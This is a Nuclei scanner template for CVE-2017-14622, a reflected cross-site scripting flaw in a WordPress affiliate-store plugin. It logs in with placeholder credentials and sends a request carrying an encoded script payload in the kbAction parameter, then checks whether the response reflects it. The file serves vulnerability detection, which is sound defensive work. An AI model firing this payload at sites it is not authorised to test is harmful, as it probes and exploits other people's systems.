nuclei-templates/cves/2017/CVE-2017-14622.yaml

46 lines
1.7 KiB
YAML

id: CVE-2017-14622
info:
name: 2kb Amazon Affiliates Store plugin < 2.1.1 - Reflected Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Multiple cross-site scripting (XSS) vulnerabilities in the 2kb Amazon Affiliates Store plugin before 2.1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php.
reference:
- https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html
- http://www.securityfocus.com/bid/101050
- https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-14622
cwe-id: CWE-79
metadata:
verified: "true"
tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 500'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "2kb-amazon-affiliates-store")'
condition: and